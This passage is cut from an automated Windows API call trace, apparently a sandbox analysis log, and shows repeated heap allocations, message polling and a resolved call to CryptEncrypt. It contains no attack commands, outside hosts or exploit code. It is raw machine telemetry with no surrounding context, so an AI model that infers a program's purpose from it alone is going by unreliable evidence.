| out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0244.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0244.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.654] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0244.654] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0244.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0244.654] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0244.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c38 | out: hHeap=0x970000) returned 1 [0244.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.654] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0244.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0244.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51478, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0244.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0244.655] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0244.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0244.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0244.655] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x200) returned 1 [0244.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e565a8 [0244.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0244.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0244.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0244.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0244.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0244.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0244.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0244.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0244.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0244.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0244.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0244.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0244.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0244.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0244.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0244.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0244.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0244.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0244.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0244.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0244.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0244.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0244.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0244.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0244.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978690 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0050 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565a8 | out: hHeap=0x970000) returned 1 [0244.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0244.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0244.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0244.663] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0244.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0244.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0244.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0244.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0244.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0244.663] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0244.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x2e565a8 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0244.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0244.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x3bf0270 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x3bf0470 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0244.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0244.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 